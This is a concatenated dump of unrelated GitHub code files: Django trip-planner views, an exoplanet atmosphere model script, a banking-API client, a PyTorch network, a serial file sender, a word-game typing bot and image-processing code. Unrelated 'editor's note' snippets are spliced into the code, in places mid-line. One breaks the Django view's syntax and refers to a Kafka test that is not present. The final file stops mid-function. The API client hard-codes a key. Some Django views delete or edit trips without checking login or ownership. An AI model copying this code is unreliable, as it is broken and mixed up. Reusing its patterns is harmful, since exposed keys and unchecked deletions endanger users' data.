django.shortcuts import render, redirect\nfrom django.contrib import messages\n\nfrom .models import *\nimport bcrypt\n\n# Create your views here.\ndef display_login_and_register_page(request): #displaying page for login/register // url will be ''\n return render(request, 'index.html') #creating the html page // 2 forms\n\ndef create_user(request): 
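# --- editor's note: hedged illustration, not part of the original file ---
# The publisher test above swaps the real Kafka producer for a MagicMock and
# asserts on the exact encoded payload. The mock-and-assert pattern reduced
# to its essentials (hypothetical topic name):
import json
from unittest.mock import MagicMock

producer = MagicMock()
message = {"msg": "hello"}
producer.send("test_topic", json.dumps(message).encode("utf-8"))
producer.send.assert_called_once_with("test_topic", b'{"msg": "hello"}')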
#url will be path(/create)\n errors = User.objects.basic_validator(request.POST) #validations\n\n if len(errors) > 0: #this is for the validations // if there is more than 1 error you will be redirected to the same page and try again\n for key, err in errors.items():\n messages.error(request, err)\n return redirect('/')\n\n\n hashed_pw = bcrypt.hashpw( #to hash the password\n request.POST['password'].encode(),\n bcrypt.gensalt()\n ).decode()\n\n created_user = User.objects.create( #creating the user // attributes \n first_name= request.POST['first_name'], #orange has to match models\n last_name= request.POST['last_name'], #yellow has to match name inside of html\n email= request.POST['email'],\n password = hashed_pw,\n )\n\n request.session['user_id'] = created_user.id #saving the user id to session // will refer to this later\n return redirect('/dashboard')\n\ndef login(request):\n potential_users = User.objects.filter(email=request.POST['email']) #email if not just change to username\n if len(potential_users) == 0:\n messages.error(request,\"Email is not in our system\") #checking validations\n return redirect('/') #will redirect you to the same page\n user = potential_users[0] #first user\n\n if not bcrypt.checkpw(request.POST['password'].encode(),user.password.encode()):\n messages.error(request, \"Please check your email and password\")\n\n\n return redirect('/')\n \n request.session['user_id'] = user.id #ADD THE REQUEST.SESSION FROM ABOVE\n return redirect('/dashboard') \n\n\n\n\n############################# ABOVE IS THE LOGIN AND REG PAGE ######################\n\n############ BELOW DASHBOARD PAGE ############\n\ndef display_dashboard_page(request): \n if \"user_id\" not in request.session:\n messages.error(request, \"You must be logged in to view that page.\") \n return redirect(\"/\") #will have to take in all trips // have to get a specific user which comes from the session\n \n\n\n context= {\n \"trips\":Trip.objects.all(), #COMMA!!\n \"user\":User.objects.get(id=request.session[\"user_id\"])\n }\n \n return render(request, \"dashboard_page.html\",context)\n\n############ CREATING TRIP BELOW ############\n\ndef create_trip_page(request): #have its own webpage url /trips/new #just the page passing all specific users\n context = {\n \n \"user\":User.objects.get(id=request.session[\"user_id\"]) #using session \n }\n\n return render(request, \"create_trip_page.html\", context) #create the html page\n\n\ndef create_trip_action(request):\n errors=Trip.objects.basic_validator(request.POST)\n\n\n if len(errors) >0:\n for err in errors.values():\n messages.error(request, err)\n return redirect(\"/trips/new\") #UPDATE THE REDIRECT WITH EVERY FUNCTIONS VALIDATIONS #\n \n\n Trip.objects.create(\n destination=request.POST[\"destination\"],\n start_date=request.POST[\"start_date\"],\n end_date=request.POST[\"end_date\"],\n plan=request.POST[\"plan\"],\n user = User.objects.get(id=request.session['user_id']) #need to include to make the connection\n )\n\n return redirect(\"/dashboard\")\n\n\ndef edit_trip_page(request, trip_id): #id to know which trip\n trip=Trip.objects.get(id=trip_id) #creating a variable\n trip.start_date=trip.start_date.strftime(\"%Y-%m-%d\") \n trip.end_date=trip.end_date.strftime(\"%Y-%m-%d\")\n\n context={\n \"trip\": trip, #refering to the variable\n \"user\":User.objects.get(id=request.session[\"user_id\"]) #including session user id // we need a specific user\n }\n return render(request, \"edit_page.html\", context)\n\n\ndef edit_trip_action(request, trip_id):\n 
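# --- editor's note: hedged illustration, not part of the original file ---
# The views above hash the password with bcrypt at registration and verify it
# with checkpw at login. The bare round trip, outside Django:
import bcrypt

hashed = bcrypt.hashpw(b"secret", bcrypt.gensalt()).decode()
assert bcrypt.checkpw(b"secret", hashed.encode())
assert not bcrypt.checkpw(b"wrong", hashed.encode())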
errors=Trip.objects.basic_validator(request.POST) #validations\n\n if len(errors) >0:\n for err in errors.values():\n messages.error(request, err)\n return redirect(f\"/trips/edit/{trip_id}\") #f string bc he need the trip id inside the url \n \n\n newtrip=Trip.objects.get(id=trip_id) #creating a variable\n\n newtrip.destination=request.POST[\"destination\"] #refering to the new variable\n newtrip.start_date=request.POST[\"start_date\"]\n newtrip.end_date=request.POST[\"end_date\"]\n newtrip.plan=request.POST[\"plan\"]\n\n newtrip.save() ##### DONT FORGET TO SAVE ########################################\n\n return redirect(\"/dashboard\")\n\n\n######## EDIT TRIP PAGE AND EDIT ACTION PAGE ABOVE #######\n######## BELOW IS THE VIEW TRIP DECRIPTION PAGE######\n\ndef view_trip_page(request, trip_id):\n context={\n \"trip\": Trip.objects.get(id=trip_id),\n \"user\": User.objects.get(id=request.session[\"user_id\"])\n }\n return render(request, \"view_trip_page.html\", context)\n\n\ndef logout(request):\n request.session.pop(\"user_id\")\n\n return redirect('/')\n\n\n\n\ndef delete(request, trip_id): #deleting the specific trip\n trip=Trip.objects.get(id=trip_id)\n trip.delete() #dont forget\n\n return redirect(\"/dashboard\") \n\n\n","repo_name":"isaacsantiago24/Trip-Planner","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72091865706","text":"import multiprocessing as mp\nimport numpy as np\nfrom petitRADTRANS import Radtrans\nfrom petitRADTRANS import nat_cst as nc\nfrom platmy import utils\n\n# Check that folder structure is ok\nutils.check_folders()\nutils.clean_outputs()\n\n# Set parameters R and T\nradii = np.arange(1.5, 3.1, 0.2) * nc.r_earth\ntemperatures = np.arange(1000., 2001., 100.)\npressures = 0.01 * np.ones_like(temperatures)\n\n# Compute mass fraction abundances according to numerical abundances in abundances.inp\nabund_type = 'subsolar'\nutils.set_abundance_file(abund_type)\nabunds, mmws = utils.get_PT_abundances_MMW(pressures, temperatures)\n\n# Define Radtrans object\nline_species = ['C2H2', 'CH4', 'CO', 'CO2', 'H2', 'H2O', 'H2S', 'HCN', 'K', 'NH3', 'Na', 'OH', 'PH3', 'TiO', 'VO']\natmosphere = Radtrans(line_species=line_species,\n rayleigh_species=['H2', 'He'],\n continuum_opacities=['H2-H2', 'H2-He'],\n wlen_bords_micron=[0.6, 5.])\n\n# Set haze and pcloud parameters\nhaze_factor = 10.\npcloud = 0.01\ndescription = f'Model using {abund_type} abundances and haze_factor={haze_factor} and pcloud={pcloud}'\n\n# Define iterable with a grid of models\nmodels = [(r, temp, abund, mmw, atmosphere, haze_factor, pcloud, description)\n for r in radii for temp, abund, mmw in zip(temperatures, abunds, mmws)]\n\n# Run models in parallel\nwith mp.Pool(mp.cpu_count() - 1) as pool:\n results = pool.starmap(utils.make_model, models)\n","repo_name":"jorgeanais/platmy","sub_path":"scripts/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"768372419","text":"import requests\nimport json\n\n# customerId = 'your customerId here'\napiKey = 'ac21b41fd2a4c1cf2e3b8e1dace9ad57'\n\nurl = 'http://api.nessieisreal.com/customers?key={}'.format(apiKey)\npayload = {\n \"first_name\": \"Achudan\",\n \"last_name\": \"T Sadhasivam\",\n \"address\": {\n \"street_number\": \"501\",\n \"street_name\": \"Thomas Jefferson Rd\",\n 
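# --- editor's note: hedged illustration, not part of the original file ---
# The trip views convert between the HTML date-input format (%Y-%m-%d) and the
# stored display format (%d/%m/%Y) in both directions. The round trip in
# isolation:
from datetime import datetime

stored = "24/12/2023"
html_value = datetime.strptime(stored, "%d/%m/%Y").strftime("%Y-%m-%d")
assert html_value == "2023-12-24"
assert datetime.strptime(html_value, "%Y-%m-%d").strftime("%d/%m/%Y") == stored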
\"city\": \"Herndon\",\n \"state\": \"VA\",\n \"zip\": \"20171\"\n }\n}\n# Create a Savings Account\nresponse = requests.post( \n\turl, \n\tdata=json.dumps(payload),\n\theaders={'content-type':'application/json'},\n\t)\n\nif response.status_code == 201:\n\tprint('account created')\nelse:\n print('customer failed')","repo_name":"HariVigneshG123/capital-one-analytics","sub_path":"postRequestCustomer.py","file_name":"postRequestCustomer.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22389347109","text":"from new_basic_block import *\nfrom Tkinter import *\nfrom collections import OrderedDict\n\n\ndef create(text,fn):\n\tf = open(fn,\"r\")\n\tjumps = ['jmp','jge','jgt','jlt','jle']\n\tlist_blocks = []\n\tinstrn = f.readline()\n\tpat = \"[a-z|A-Z][a-z|A-Z|0-9]*[\\s]*:\"\n\tcount = 1\n\n\tb = block()\n\tb.start = count\n\tend_file=False\n\t\n\tblock_d = {}\t\n\n\twhile instrn :\n\t\tinstrn = instrn.strip() \n\t\ttemp = instrn\n\t\tfirst_word = instrn.split(' ')[0]\n\t\tinstrn = f.readline()\n\n\t\tif(first_word in jumps):\n\t\t\tb.end = count\n\t\t\tlist_blocks.append(b)\n\t\t\tb.instrn_list[count] = temp\n\t\t\tb.instrn_numbs.append(count)\n\n\t\t\tif(instrn):\n\t\t\t\tb = block()\n\t\t\t\tb.start = count + 1\n\t\t\t\tend_file=False\n\t\t\telse:\n\t\t\t\tend_file = True\n\n\t\telif(re.match(pat,first_word)):\n\t\t\tsecond_word = temp.split(' ')[1]\n\t\t\n\t\t\tif(count is not 1):\n\t\t\t\tb.end = count - 1\n\t\t\t\tlist_blocks.append(b)\n\t\t\n\t\t\tb = block()\n\t\t\tb.start = count\n\n\t\t\tif(second_word in jumps):\n\t\t\t\tb.end = b.start\n\t\t\t\tb.instrn_list[count] = temp\n\t\t\t\tb.instrn_numbs.append(count)\n\t\t\t\tlist_blocks.append(b)\n\t\t\t\tb=block()\n\t\t\t\tb.start = count + 1\n\t\t\t\n\t\t\tb.instrn_list[count] = temp\t\t\n\t\t\tb.instrn_numbs.append(count)\n\t\telse:\n\t\t\tb.instrn_list[count] = temp\n\t\t\tb.instrn_numbs.append(count)\n\t\n\t\tcount = count + 1\n\t\n\tif(not end_file):\n\t\tb.end = count - 1\n\t\tlist_blocks.append(b)\n\t\n\n\ti = 1\n\tfor b in list_blocks:\n\t\tblock_d[\"BASIC\"+str(i)] = b.display\n\t\ti = i + 1\n\t\tb.display(text)\t\n\n\t\n\treturn list_blocks\n\n","repo_name":"soniyasadalkar/BasicBlockProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18556121226","text":"import torch\nimport torch.nn as nn\n\nclass PermInvariantQNN(torch.nn.Module):\n \"\"\"\n Permutation Invariant Network\n \n :param in_invar_dim: Number of total features across all agents that needs to be perm invariant \n :param non_invar_dim: Number of total features constant across all agents\n :param out_dim: Dimension of output\n :param block_size: Number of invariant features of each agent\n :param num_moments: Number of features/moments to summarize invariant features of each agent\n :raises assertError: Raise assertion error if in_invar_dim not multiple of block size\n \"\"\"\n \n block_size: int\n in_invar_dim: int\n non_invar_dim: int\n num_moments: int\n out_dim: int\n\n def __init__(self, in_invar_dim, non_invar_dim,\n out_dim, block_size=1, num_moments=1):\n super(PermInvariantQNN, self).__init__()\n\n # Store input and output dimensions\n self.in_invar_dim = in_invar_dim\n self.non_invar_dim = non_invar_dim\n self.block_size = block_size\n self.num_moments = num_moments\n self.out_dim = out_dim\n\n # Verify 
invariant dimension is multiple of block size\n assert not self.in_invar_dim % self.block_size, \"in_invar_dim must be a multiple of block size.\"\n\n # Compute Number of blocks\n self.num_blocks = self.in_invar_dim / self.block_size\n\n # Define Networks\n self.moment_encoder_net = nn.Sequential(\n nn.Linear(self.block_size, 20),\n nn.LeakyReLU(),\n nn.Linear(20, 20),\n nn.LeakyReLU(),\n nn.Linear(20, self.num_moments),\n #nn.BatchNorm1d(self.num_moments)\n )\n\n self.decoder_net = nn.Sequential(\n nn.Linear(self.num_moments + self.non_invar_dim, 20),\n nn.ReLU(),\n nn.Linear(20, 20),\n nn.ReLU(),\n nn.Linear(20, self.out_dim)\n )\n\n def forward(self, invar_input, non_invar_input):\n # Reshape invar_input into blocks and compute \"moments\"\n invar_split = torch.split(invar_input, self.block_size, dim=1)\n invar_moments = sum((self.moment_encoder_net(ch) for ch in invar_split))\n\n # Concat moment vector with non-invariant input and pipe into next layer\n cat_input = torch.cat((invar_moments, non_invar_input), dim=1)\n\n # Output Final Tensor\n out_tensor = self.decoder_net(cat_input)\n return out_tensor","repo_name":"p-casgrain/Nash-DQN","sub_path":"Nash DQN - Old/nashRL_netlib.py","file_name":"nashRL_netlib.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"70385138029","text":"from classes.FileService import FileService\n\nnew_file_system = FileService()\n\n\nwhile True:\n command = input(\"set - сохранить файл по ID\\n get - выдача сохраненного файла\\n del - удаление по ID\\n change - изменение ID сохраненного файла\\n few - получение нескольких файлов по ID\\n backup - бэкап в файл\\n recover - восстановление из файла\\n view - посмотреть файлы \\n exit - выход:\\n \")\n if command == \"exit\":\n print(\"Вы вышли\")\n exit(0)\n elif command == \"set\":\n print(\"ваш id : \",new_file_system.set_file(input(\"Укажите имя файла:\\n\")))\n elif command == \"get\":\n try:\n print(new_file_system.get_file(int(input(\"Укажите id файла:\\n\"))))\n except NonExistentException as e:\n print(f\"SMTH WRONG: {e} \")\n\n elif command == \"del\":\n try:\n print(new_file_system.del_file(int(input(\"Укажите ID файла:\\n\"))))\n except NonExistentException as e:\n print(f\"SMTH WRONG: {e} \")\n elif command == \"change\":\n try:\n print(new_file_system.change_id(int(input(\"Укажите id файла:\")),int(input(\"Укажите новый id файла:\"))))\n except IncorrectArgExeption as e:\n print(f\"SMTH WRONG: {e} \")\n elif command == \"few\":\n print(new_file_system.get_few_files(input(\"Укажите ID файлов через пробел:\\n\")))\n elif command == \"backup\":\n print(new_file_system.backup())\n elif command == \"recover\":\n print(new_file_system.recover())\n elif command == \"view\":\n print(\"Your files: \")\n new_file_system.view_data()\n else:\n print(\"This command doesn't exist\")\n\n\n","repo_name":"ArtemShev/uni_works","sub_path":"prog_lang/lab_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25971297153","text":"import yaml\nfrom typing import Optional\n\n\nclass Confing:\n\n def __init__(self):\n self.ip_address: Optional[str] = None\n self.port: Optional[str] = None\n self.redis: Optional[dict] = None\n\n def load_config(self, path_to_config: str):\n with open(path_to_config) as f:\n config_d = yaml.safe_load(f)\n api_conf = config_d[\"api\"]\n self.port = 
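# --- editor's note: hedged illustration, not part of the original file ---
# PermInvariantQNN is permutation-invariant because every block passes through
# the same encoder and the per-block moments are summed. A quick property
# test one could run against the class above (hypothetical sizes: 4 agents,
# block_size 2):
import torch

net = PermInvariantQNN(in_invar_dim=8, non_invar_dim=3, out_dim=2,
                       block_size=2, num_moments=5)
inv, noninv = torch.randn(1, 8), torch.randn(1, 3)
perm = inv.reshape(1, 4, 2)[:, torch.randperm(4), :].reshape(1, 8)
assert torch.allclose(net(inv, noninv), net(perm, noninv), atol=1e-5)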
api_conf.get(\"port\") or None\n self.ip_address = api_conf.get(\"ip_address\") or None\n self.redis = config_d[\"redis\"]\n\n\nclass ConfingAlgo:\n def __init__(self):\n self.receiver: Optional[dict] = None\n self.sender: Optional[dict] = None\n self.service_type: Optional[str] = None\n self.pdf_parameters: Optional[dict] = None\n\n def load_config(self, path_to_config: str):\n with open(path_to_config) as f:\n config_alg = yaml.safe_load(f)\n self.receiver = config_alg[\"receiver\"]\n self.sender = config_alg[\"sender\"]\n self.service_type = config_alg[\"service_type\"]\n self.pdf_parameters = config_alg[\"pdf_parameters\"]\n\n def to_dict(self) -> dict:\n return {\n \"sender\": self.sender,\n \"receiver\": self.receiver,\n \"service_type\": self.service_type,\n \"pdf_parameters\": self.pdf_parameters\n }\n\n def update(self, config_dict: dict):\n self.receiver = config_dict[\"receiver\"]\n self.sender = config_dict[\"sender\"]\n self.service_type = config_dict[\"service_type\"]\n self.pdf_parameters = config_dict[\"pdf_parameters\"]\n\n\ncf = Confing()\ncf_algo = ConfingAlgo()\n\nif __name__ == '__main__':\n conf_algo = ConfingAlgo()\n conf_algo.load_config(\"config_app.yaml\")\n","repo_name":"matikurcze00/CherryPickers","sub_path":"API/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12681236638","text":"#!/usr/bin/env python3\n\"\"\"Command line entry point\"\"\"\n\nimport sys\nimport logging\nimport argparse\nfrom pathlib import Path\n\nimport serial\nfrom serial.tools import list_ports, list_ports_common\n\nfrom . import core, name\n\nlogging.basicConfig(level=logging.DEBUG)\nLOG = logging.getLogger()\n\ndef get_serial_device() -> list_ports_common.ListPortInfo:\n if sys.platform == \"darwin\":\n return next(list_ports.grep(\"usbserial\"))\n return next(list_ports.grep(\"ttyusb0\"))\n\ndef send(args: argparse.Namespace) -> None:\n \"\"\"Send data file\"\"\"\n with open(str(args.file), \"rb\") as data_io:\n data = data_io.read()\n\n wire_data = core.WireFormat(args.file.name, data)\n try:\n usb_serial_port = args.device or get_serial_device()\n except StopIteration:\n LOG.critical(\"Serial device not found; exiting\")\n sys.exit(3)\n with serial.Serial(usb_serial_port.device, baudrate=args.baudrate) as serial_device:\n core.send(wire_data, serial_device)\n\ndef listen(args: argparse.Namespace) -> None:\n \"\"\"Listen for data\"\"\"\n try:\n usb_serial_port = args.device or get_serial_device()\n except StopIteration:\n LOG.critical(\"Serial device not found; exiting\")\n sys.exit(1)\n with serial.Serial(usb_serial_port.device, baudrate=args.baudrate) as serial_device:\n while True:\n try:\n core.listen_and_write(serial_device)\n except core.ListenError:\n LOG.warning(\"Error; continuing\")\n continue\n except KeyboardInterrupt:\n break\n\ndef main() -> None:\n \"\"\"Entry point\"\"\"\n parser = argparse.ArgumentParser(prog=name,\n description=\"send and receive data\")\n parser.add_argument(\"--baudrate\", \"-b\", type=int, default=115200)\n parser.add_argument(\"--device\", \"-d\", type=list_ports_common.ListPortInfo,\n default=None)\n subparsers = parser.add_subparsers(title=\"subcommands\",\n description=\"valid subcommands\")\n listen_parser = subparsers.add_parser(\"listen\", aliases=[\"l\"])\n send_parser = subparsers.add_parser(\"send\", aliases=[\"s\"])\n send_parser.add_argument(\"file\", type=Path, metavar=\"FILE\")\n 
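# --- editor's note: hedged illustration, not part of the original file ---
# ConfingAlgo above round-trips between YAML-derived dicts and its fields via
# update() and to_dict(). A minimal check of that contract (sample values are
# hypothetical):
sample = {"receiver": {"host": "a"}, "sender": {"host": "b"},
          "service_type": "pdf", "pdf_parameters": {"dpi": 300}}
cfg = ConfingAlgo()
cfg.update(sample)
assert cfg.to_dict() == sample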
listen_parser.set_defaults(func=listen)\n send_parser.set_defaults(func=send)\n args = parser.parse_args()\n\n try:\n args.func(args)\n except AttributeError:\n parser.print_help(sys.stderr)\n sys.exit(4)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fionn/diode","sub_path":"diode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9964882710","text":"\n\nclass Person:\n def __init__(self, name, age):\n print('init called')\n self.name = name\n self.age = age\n\n def display(self):\n print('in display')\n print(\"Name-\", self.name)\n print(\"Age-\", self.age)\n # object of class MyClass\n\n # passing person object to\n # method of MyClass (self = person here)\n\n\n\nperson = Person('John', 40)\nperson.display() #displays everything in the block","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"_12_oops/_00_basics/self_notes/class display.py","file_name":"class display.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9789949228","text":"import pandas as pd\n\nclass SaveSegmentData():\n\n def __init__(self) -> None:\n self.segment_count = 0\n self.segmented_data_dict = dict()\n\n def get_feature_and_category_condition(self,condition):\n split_key_value = condition.split(',')\n condition_dict = {item.split(':')[0]:item.split(':')[-1] for item in split_key_value}\n return condition_dict\n\n def create_and_save_segment(self,train_df,condition_dict):\n if '>' in condition_dict.get('categories'):\n condition = int(condition_dict.get('categories').split('>')[-1])\n column = condition_dict.get('feature')\n print(__name__,condition,column)\n segmented_index = train_df[train_df[column]>condition].index\n remaining_index =train_df[train_df[column]<=condition].index\n elif '<=' in condition_dict.get('categories'):\n condition = int(condition_dict.get('categories').split('<=')[-1])\n column = condition_dict.get('feature')\n print(__name__,condition,column)\n segmented_index = train_df[train_df[column]<=condition].index\n remaining_index = train_df[train_df[column]>condition].index\n else:\n condition = condition_dict.get('categories')\n column = condition_dict.get('feature')\n print(__name__,condition,column)\n segmented_index = train_df[train_df[column]==condition].index\n remaining_index = train_df[train_df[column]!=condition].index\n print(__name__,remaining_index)\n # self.new_train = remaining_index\n self.segmented_data_dict['segmented_index'+str(self.segment_count)] = segmented_index\n self.segmented_data_dict['remaining_index'] = remaining_index\n print(self.segmented_data_dict)\n self.segment_count += 1\n\n # def __call__(self):\n # return self.segmented_data_dict\n \n\n\n\n\n\n","repo_name":"Zidane786/Segmentation","sub_path":"segmentation/utils/save_segment_data.py","file_name":"save_segment_data.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34377700483","text":"from tools import *\n\n\n__author__ = 'Håkon Hukkelås'\n\ndef do_task():\n im = Image.open(\"images/bush.tiff\")\n im.show()\n matrix = image_to_matrix(im)\n im = applyFilterInFD(im.convert('L'),h_g)[0]\n im.show()\n new_im = matrix_to_image(aliasing(image_to_matrix(im)),'L')\n 
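# --- editor's note: hedged illustration, not part of the original file ---
# main() in the diode CLI above dispatches subcommands by attaching a handler
# with set_defaults(func=...) and calling args.func(args). The pattern in
# miniature:
import argparse

parser = argparse.ArgumentParser(prog="demo")
sub = parser.add_subparsers(title="subcommands")
greet = sub.add_parser("greet")
greet.set_defaults(func=lambda args: print("hello"))
args = parser.parse_args(["greet"])
args.func(args)                                # runs the chosen subcommand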
new_im.show()\n\ndo_task()\n","repo_name":"StianHanssen/Digital-Image-Processing","sub_path":"oving2/task_2b.py","file_name":"task_2b.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39229422206","text":"import pyautogui\nfrom sys import argv\nfrom json import load\n\nonce = '--once' in argv\n\npyautogui.PAUSE = 1\npyautogui.FAILSAFE = True\n\nw, h = pyautogui.size()\n\ncurrentX, currentY = pyautogui.position()\ndef shallRun():\n global currentX, currentY\n\n x, y = pyautogui.position()\n r = currentX != x or currentY != y\n\n if r:\n currentX, currentY = x, y\n return r\n\ndef getWords():\n file = open('words.json')\n return load(file)\n\ndef selectWord(words: [(str, int)], done: [int], letters):\n selected = list(filter(lambda x: letters in x[0] and not x[1] in done, words))\n if not len(selected):\n return\n selection = selected[0]\n \n if bool(selection):\n done.append(selection[1])\n\n return selection[0]\n\ndef main():\n words = getWords()\n done = []\n \n while True:\n letters = input(\"Lettres :\")\n\n selected = selectWord(words, done, letters)\n if not selected:\n continue\n\n print(\"🚀 ~ file: main.py:45 ~ selected:\", selected)\n if not not selected:\n pyautogui.leftClick()\n pyautogui.typewrite(selected)\n pyautogui.press('enter')\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Greensky-gs/bombparty-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24664046079","text":"# -*- coding: utf-8 -*-\n# !/usr/bin/python3\n# SkillFramework 1.0.0 face detection demo\n\nimport hilens\nimport cv2\nimport numpy as np\nfrom postprocess import im_detect_nms\n\n# 网络输入尺寸\ninput_height = 480\ninput_width = 480\n\n\ndef main():\n \"\"\" 利用SkillFramework进行人脸检测模型的推理 \"\"\"\n hilens.init(\"test\") # 参数要与创建技能时填写的检验值保持一致\n model_path = hilens.get_model_dir() + \"face_detection_demo.om\" # 模型路径\n model = hilens.Model(model_path)\n display_hdmi = hilens.Display(hilens.HDMI) # 图像通过hdmi输出到屏幕\n camera = hilens.VideoCapture()\n\n \n while True:\n # 1. 读取摄像头输入(yuv nv21)\n input_nv21 = camera.read()\n \n # 2. 转为bgr\n input_bgr = cv2.cvtColor(input_nv21, cv2.COLOR_YUV2BGR_NV21)\n src_image_height = input_bgr.shape[0]\n src_image_width = input_bgr.shape[1]\n \n # 3. 保留原图比例的resize为网络输入尺寸\n im_scale1 = float(input_width) / float(src_image_width)\n im_scale2 = float(input_height) / float(src_image_height)\n im_scale = min(im_scale1, im_scale2)\n input_bgr_rescaled = cv2.resize(input_bgr, None, None, fx=im_scale, fy=im_scale)\n input_bgr_resized = np.zeros((input_height, input_width, 3), dtype = np.uint8)\n input_bgr_resized[0:input_bgr_rescaled.shape[0],0:input_bgr_rescaled.shape[1],:] = input_bgr_rescaled\n \n # 3. 推理\n outputs = model.infer([input_bgr_resized.flatten()])\n \n # 4. 后处理得到人脸bounding box,恢复到原图比例,画人脸框\n detect_boxes = im_detect_nms(outputs[0])\n if len(detect_boxes) > 0:\n for rect in detect_boxes:\n left = max(rect[0] / im_scale, 0)\n top = max(rect[1] / im_scale, 0)\n right = min(rect[2] / im_scale, src_image_width)\n bottom = min(rect[3] / im_scale, src_image_height)\n cv2.rectangle(input_bgr, (int(left), int(top)), (int(right), int(bottom)), 255, 2)\n \n # 5. 
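# --- editor's note: hedged illustration, not part of the original file ---
# The HiLens face-detection demo below letterboxes each frame: scale by the
# smaller of the two ratios, paste into a fixed canvas, and keep im_scale to
# map detections back to source coordinates. The resize step on its own:
import cv2
import numpy as np

def letterbox(img, out_w, out_h):
    h, w = img.shape[:2]
    scale = min(out_w / w, out_h / h)          # preserve the aspect ratio
    resized = cv2.resize(img, None, fx=scale, fy=scale)
    canvas = np.zeros((out_h, out_w, 3), dtype=np.uint8)
    canvas[:resized.shape[0], :resized.shape[1]] = resized
    return canvas, scale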
输出图像,必须是yuv nv21形式\n output_nv21 = hilens.cvt_color(input_bgr, hilens.BGR2YUV_NV21)\n display_hdmi.show(output_nv21)\n\n\nif __name__ == \"__main__\":\n \n main()\n","repo_name":"huaweicloud/HiLens-Lab","sub_path":"official_examples/技能模板/Face_Detection_Template/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"9967440900","text":"# writing items in rows and columns in excel sheet\nheader = ['id', 'name', 'phone number']\nids = [1, 2, 3, 4]\nnames = ['sachin', 'virat', 'dravid', 'dhoni']\nphnum = [113, 114, 115, 116]\n\nimport xlsxwriter\n\nwb = xlsxwriter.Workbook('cric_player.xlsx')\nws = wb.add_worksheet(name='deatils')\n\n# for headers\nr0 = 0\nc0 = 0\nfor i1 in header:\n ws.write(r0, c0, i1)\n c0 += 1\n#using loops\nc1 = 0\nfor r1,id in zip(range(1,5),ids):\n ws.write(r1, c1, id)\nc2 = 1\nfor r1,name in zip(range(1,5),names):\n ws.write(r1,c2,name)\nc3=2\nfor r1,pnum in zip(range(1,5),phnum):\n ws.write(r1,c3,pnum)\n\nwb.close()","repo_name":"SACHINKV14/MCS_00_Sachin_Core_Python","sub_path":"practice 04 Dec/harsha_tasks/_27_dec_/_excel_file_5.py","file_name":"_excel_file_5.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29234081699","text":"#!/usr/bin/env python3\nimport os\nimport numpy as np \nfrom pylab import imshow, show\nfrom time import time\nfrom numba import autojit, jit, cuda\nfrom numpy import math\n\n\nTr = 0.3\nBLOCKDIM = (32,16)\nGRIDDIM = (32,16)\n\ndef timer(func):\n def deco(*args, **kwargs): \n start = time()\n res = func(*args, **kwargs)\n stop = time()\n print('function (%s) cost %f seconds' %(func.__name__,stop-start))\n return res \n return deco\n\n'''\n\t- claculating one pixel`s lbsp value\n\t- using gray image for LBSP\n'''\n@jit\ndef lbsp_pixel(img,base_w,base_h):\n\t\theight,width = img.shape\n\t\tlbsp_value = 0\n\t\t#run_idx = 15\n\t\tfor bias_w in (range(-2,3)):\n\t\t\tfor bias_h in range(-2,3):\n\t\t\t\tif abs(bias_w)+abs(bias_h) == 3 or abs(bias_w)+abs(bias_h) == 0 :\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tcoordinate_w = bias_w+base_w\n\t\t\t\t\tcoordinate_h = bias_h+base_h\n\t\t\t\t\tflag = 0\n\t\t\t\t\tif coordinate_w >= 0 and coordinate_h >= 0 and coordinate_w < width and coordinate_h < height :\n\t\t\t\t\t\t#pay attention here, type img is uint8, if no converting to float, will come some unknown problem\n\t\t\t\t\t\tif abs(np.float(img[base_h,base_w])-np.float(img[coordinate_h,coordinate_w])) <= np.float(img[base_h,base_w])*Tr :\n\t\t\t\t\t\t\tflag = 1\n\t\t\t\t\t#lbsp_value = lbsp_value + flag*(2**run_idx)\n\t\t\t\t\t#run_idx = run_idx - 1\n\t\t\t\t\tlbsp_value = (lbsp_value << 1) + flag\t\t\t\t\n\t\treturn lbsp_value\n\ndef debug_lbsp_pixel(img,base_x,base_y):\n\t\theight,width = img.shape\n\t\tlbsp_value = 0\n\t\t#run_idx = 15\n\t\tbins = 